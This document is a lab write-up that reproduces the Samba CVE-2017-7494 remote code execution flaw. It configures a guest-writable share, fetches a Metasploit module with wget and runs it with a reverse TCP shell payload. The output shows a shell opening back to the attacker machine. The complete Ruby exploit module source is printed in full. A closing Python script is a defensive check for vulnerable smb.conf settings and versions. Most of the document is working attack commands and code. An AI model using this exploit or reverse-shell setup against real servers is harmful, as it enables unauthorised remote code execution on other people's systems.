I. Setting up the reproduction environment

Set up two virtual machines, Debian and Kali: attacker: Kali (192.168.217.162); target: Debian (192.168.217.150).

II. Installing and configuring Samba on Debian

1. First, download and install the Samba server:

# apt-get install samba

2. On Debian, create a shared directory; here I use /mnt/shared:

# mkdir  /mnt/shared

3. Edit the Samba configuration file /etc/samba/smb.conf and append the following at the end:

[shared]
  comment = 'Share for work'
  path= /mnt/shared
  guest ok = yes
  public = yes
  writable = yes
  create mask = 0777

4. Set the permissions on /mnt/shared (the share is guest-accessible and writable, so the directory is made world-writable to match):

# chmod -R 777 /mnt/shared

5. Restart the Samba service:

# /etc/init.d/samba restart

III. Setting up the attacker machine (Kali)

Open a terminal on Kali, change into the linux folder under Metasploit's exploits directory, create a new smb folder, and put the exploit script in it:

# cd /usr/share/metasploit-framework/modules/exploits/linux
# mkdir smb
# cd smb
# wget https://raw.githubusercontent.com/hdm/metasploit-framework/0520d7cf76f8e5e654cb60f157772200c1b9e230/modules/exploits/linux/samba/is_known_pipename.rb
# mv is_known_pipename.rb cve-2017-7494.rb

Launch Metasploit and run the exploit (I renamed the exploit script to cve-2017-7494.rb, so the module is loaded under that name):

# msfconsole
msf > use exploit/linux/smb/cve-2017-7494
msf exploit(cve-2017-7494) > set rhost 192.168.217.150
rhost => 192.168.217.150
msf exploit(cve-2017-7494) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf exploit(cve-2017-7494) > set lhost 192.168.217.162
lhost => 192.168.217.162
msf exploit(cve-2017-7494) > run
[*] Started reverse TCP handler on 192.168.217.162:4444
[*] 192.168.217.150:445 - Using location \\192.168.217.150\shared\ for the path
[*] 192.168.217.150:445 - Payload is stored in //192.168.217.150/shared/ as WzyvkESS.so
[*] 192.168.217.150:445 - Trying location /volume1/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume1/shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume1/SHARED/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume1/Shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume2/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume2/shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume2/SHARED/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume2/Shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume3/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume3/shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume3/SHARED/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume3/Shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /shared/shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /shared/SHARED/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /shared/Shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /mnt/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /mnt/shared/WzyvkESS.so...
[*] Sending stage (38 bytes) to 192.168.217.150
[*] Command shell session 2 opened (192.168.217.162:4444 -> 192.168.217.150:56540) at 2017-05-26 01:17:48 -0400

id
uid=65534(nobody) gid=0(root) egid=65534(nogroup) groups=65534(nogroup)

ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:6e:9a:4a
inet addr:192.168.217.150 Bcast:192.168.217.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe6e:9a4a/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:6769 errors:0 dropped:0 overruns:0 frame:0
TX packets:700 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:479898 (468.6 KiB) TX bytes:102796 (100.3 KiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:35 errors:0 dropped:0 overruns:0 frame:0
TX packets:35 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:3557 (3.4 KiB) TX bytes:3557 (3.4 KiB)

whoami
nobody

POC:

 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking

   include Msf::Exploit::Remote::DCERPC
   include Msf::Exploit::Remote::SMB::Client

   def initialize(info = {})
     super(update_info(info,
       'Name'           => 'Samba is_known_pipename() Arbitrary Module Load',
       'Description'    => %q{
           This module triggers an arbitrary shared library load vulnerability
         in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module
         requires valid credentials, a writeable folder in an accessible share,
         and knowledge of the server-side path of the writeable folder. In
         some cases, anonymous access combined with common filesystem locations
         can be used to automatically exploit this vulnerability.
       },
       'Author'         =>
         [
           'steelo <knownsteelo[at]gmail.com>',    # Vulnerability Discovery
           'hdm',                                  # Metasploit Module
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
         [
           [ 'CVE', '2017-7494' ],
           [ 'URL', 'https://www.samba.org/samba/security/CVE-2017-7494.html' ],
         ],
       'Payload'         =>
         {
           'Space'       => 9000,
           'DisableNops' => true
         },
       'Platform'        => 'linux',
       #
       # Targets are currently limited by platforms with ELF-SO payload wrappers
       #
       'Targets'         =>
         [
           [ 'Linux ARM (LE)',   { 'Arch' => ARCH_ARMLE } ],
           [ 'Linux x86',        { 'Arch' => ARCH_X86 } ],
           [ 'Linux x86_64',     { 'Arch' => ARCH_X64 } ],
         # [ 'Linux MIPS',       { 'Arch' => MIPS } ],
         ],
       'Privileged'      => true,
       'DisclosureDate'  => 'Mar 24 2017',
       'DefaultTarget'   => 2))

     register_options(
       [
         OptString.new('SMB_SHARE_NAME', [false, 'The name of the SMB share containing a writeable directory']),
         OptString.new('SMB_SHARE_BASE', [false, 'The remote filesystem path correlating with the SMB share name']),
         OptString.new('SMB_FOLDER', [false, 'The directory to use within the writeable SMB share']),
       ])
   end

   def generate_common_locations
     candidates = []
     if datastore['SMB_SHARE_BASE'].to_s.length > 0
       candidates << datastore['SMB_SHARE_BASE']
     end

     %W{/volume1 /volume2 /volume3 /shared /mnt /mnt/usb /media /mnt/media /var/samba /tmp /home /home/shared}.each do |base_name|
       candidates << base_name
       candidates << [base_name, @share]
       candidates << [base_name, @share.downcase]
       candidates << [base_name, @share.upcase]
       candidates << [base_name, @share.capitalize]
       candidates << [base_name, @share.gsub(" ", "_")]
     end

     candidates.uniq
   end

   def enumerate_directories(share)
     begin
       self.simple.connect("\\\\#{rhost}\\#{share}")
       stuff = self.simple.client.find_first("\\*")
       directories = [""]
       stuff.each_pair do |entry,entry_attr|
         next if %W{. ..}.include?(entry)
         next unless entry_attr['type'] == 'D'
         directories << entry
       end
       return directories

     rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
       vprint_error("Enum #{share}: #{e}")
       return nil

     ensure
       if self.simple.shares["\\\\#{rhost}\\#{share}"]
         self.simple.disconnect("\\\\#{rhost}\\#{share}")
       end
     end
   end

   def verify_writeable_directory(share, directory="")
     begin
       self.simple.connect("\\\\#{rhost}\\#{share}")

       random_filename = Rex::Text.rand_text_alpha(5)+".txt"
       filename = directory.length == 0 ? "\\#{random_filename}" : "\\#{directory}\\#{random_filename}"

       wfd = simple.open(filename, 'rwct')
       wfd << Rex::Text.rand_text_alpha(8)
       wfd.close
       simple.delete(filename)
       return true

     rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
       vprint_error("Write #{share}#(unknown): #{e}")
       return false

     ensure
       if self.simple.shares["\\\\#{rhost}\\#{share}"]
         self.simple.disconnect("\\\\#{rhost}\\#{share}")
       end
     end
   end

   def share_type(val)
     [ 'DISK', 'PRINTER', 'DEVICE', 'IPC', 'SPECIAL', 'TEMPORARY' ][val]
   end

   def enumerate_shares_lanman
     shares = []
     begin
       res = self.simple.client.trans(
         "\\PIPE\\LANMAN",
         (
           [0x00].pack('v') +
           "WrLeh\x00"   +
           "B13BWz\x00"  +
           [0x01, 65406].pack("vv")
         ))
     rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
       vprint_error("Could not enumerate shares via LANMAN")
       return []
     end
     if res.nil?
       vprint_error("Could not enumerate shares via LANMAN")
       return []
     end

     lerror, lconv, lentries, lcount = res['Payload'].to_s[
       res['Payload'].v['ParamOffset'],
       res['Payload'].v['ParamCount']
     ].unpack("v4")

     data = res['Payload'].to_s[
       res['Payload'].v['DataOffset'],
       res['Payload'].v['DataCount']
     ]

     0.upto(lentries - 1) do |i|
       sname,tmp = data[(i * 20) +  0, 14].split("\x00")
       stype     = data[(i * 20) + 14, 2].unpack('v')[0]
       scoff     = data[(i * 20) + 16, 2].unpack('v')[0]
       scoff -= lconv if lconv != 0
       scomm,tmp = data[scoff, data.length - scoff].split("\x00")
       shares << [ sname, share_type(stype), scomm]
     end

     shares
   end

   def probe_module_path(path)
     begin
       simple.create_pipe(path)
     rescue Rex::Proto::SMB::Exceptions::ErrorCode => e
       vprint_error("Probe: #{path}: #{e}")
     end
   end

   def find_writeable_path(share)
     subdirs = enumerate_directories(share)
     return unless subdirs

     if datastore['SMB_FOLDER'].to_s.length > 0
       subdirs.unshift(datastore['SMB_FOLDER'])
     end

     subdirs.each do |subdir|
       next unless verify_writeable_directory(share, subdir)
       return subdir
     end

     nil
   end

   def find_writeable_share_path
     @path = nil
     share_info = enumerate_shares_lanman
     if datastore['SMB_SHARE_NAME'].to_s.length > 0
       share_info.unshift [datastore['SMB_SHARE_NAME'], 'DISK', '']
     end

     share_info.each do |share|
       next if share.first.upcase == 'IPC$'
       found = find_writeable_path(share.first)
       next unless found
       @share = share.first
       @path  = found
       break
     end
   end

   def find_writeable
     find_writeable_share_path
     unless @share && @path
       print_error("No suiteable share and path were found, try setting SMB_SHARE_NAME and SMB_FOLDER")
       fail_with(Failure::NoTarget, "No matching target")
     end
     print_status("Using location \\\\#{rhost}\\#{@share}\\#{@path} for the path")
   end

   def upload_payload
     begin
       self.simple.connect("\\\\#{rhost}\\#{@share}")

       random_filename = Rex::Text.rand_text_alpha(8)+".so"
       filename = @path.length == 0 ? "\\#{random_filename}" : "\\#{@path}\\#{random_filename}"
       wfd = simple.open(filename, 'rwct')
       wfd << Msf::Util::EXE.to_executable_fmt(framework, target.arch, target.platform, payload.encoded, "elf-so", {:arch => target.arch, :platform => target.platform}
       )
       wfd.close

       @payload_name = random_filename
       return true

     rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
       print_error("Write #{@share}#(unknown): #{e}")
       return false

     ensure
       if self.simple.shares["\\\\#{rhost}\\#{@share}"]
         self.simple.disconnect("\\\\#{rhost}\\#{@share}")
       end
     end
   end

   def find_payload
     print_status("Payload is stored in //#{rhost}/#{@share}/#{@path} as #{@payload_name}")

     # Reconnect to IPC$
     simple.connect("\\\\#{rhost}\\IPC$")

     #
     # In a perfect world we would find a way make IPC$'s associated CWD
     # change to our share path, which would allow the following code:
     #
     # probe_module_path("/proc/self/cwd/#{@path}/#{@payload_name}")
     #

     # Until we find a better way, brute force based on common paths
     generate_common_locations.each do |location|
       target = [location, @path, @payload_name].join("/").gsub(/\/+/, '/')
       print_status("Trying location #{target}...")
       probe_module_path(target)
     end
   end

   def exploit
     # Setup SMB
     connect
     smb_login

     # Find a writeable share
     find_writeable

     # Upload the shared library payload
     upload_payload

     # Find and execute the payload from the share
     find_payload rescue Rex::StreamClosedError

     # Shutdown
     disconnect
   end

 end
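As an added defender-side check (not part of this write-up or of the Metasploit module), the following Python script parses an smb.conf, flags shares that are both guest-accessible and writable (the precondition named in the module's description, and exactly what the [shared] section in section II creates), reports whether the Samba-documented workaround `nt pipe support = no` is present in [global], and tests a Samba version string against the fixed releases 4.6.4, 4.5.10 and 4.4.14. The sample configuration and version strings are constructed for the example.

```python
import re
# Constructed sample: the [shared] section from this write-up under an empty [global]
SAMPLE_CONF = """
[global]
[shared]
  comment = 'Share for work'
  path= /mnt/shared
  guest ok = yes
  public = yes
  writable = yes
  create mask = 0777
"""
def parse_smb_conf(text):
    """Minimal smb.conf parser -> {section: {key: value}}; keys lowercased (Samba is case-insensitive)."""
    conf, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;": continue  # blank lines and comments
        m = re.match(r"\[(.+)\]$", line)
        if m:
            section = m.group(1).strip()
            conf[section] = {}
        elif section is not None and "=" in line:
            key, value = line.split("=", 1)
            conf[section][" ".join(key.lower().split())] = value.strip()
    return conf

is_yes = lambda value: (value or "").strip().lower() in ("yes", "true", "1")
def guest_writable_shares(conf):
    """Shares an anonymous client can write to: the precondition the module needs (drop a .so, then
    open its absolute path as a pipe name). 'public' = 'guest ok'; 'writable'/'writeable' invert 'read only'."""
    found = []
    for name, opts in conf.items():
        if name.lower() in ("global", "printers", "ipc$"): continue
        guest = is_yes(opts.get("guest ok")) or is_yes(opts.get("public"))
        writable = (is_yes(opts.get("writable")) or is_yes(opts.get("writeable"))
                    or (opts.get("read only") or "").strip().lower() == "no")
        if guest and writable: found.append(name)
    return found

def nt_pipe_support_disabled(conf):
    """'nt pipe support = no' in [global] is Samba's documented workaround when patching is not possible."""
    return (conf.get("global", {}).get("nt pipe support") or "").strip().lower() == "no"

def version_vulnerable(version):
    """Affected: 3.5.0 up to (not including) the fixed releases 4.4.14 / 4.5.10 / 4.6.4.
    Accepts the raw output of `smbd -V`, e.g. 'Version 4.5.8-Debian'."""
    v = tuple(int(x) for x in re.findall(r"\d+", version)[:3])
    fixed = {(4, 6): (4, 6, 4), (4, 5): (4, 5, 10)}.get(v[:2], (4, 4, 14))
    return (3, 5, 0) <= v < fixed
```

Run against the target's real /etc/samba/smb.conf and `smbd -V`, a hit from guest_writable_shares together with version_vulnerable and no workaround is the configuration this write-up exploits.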
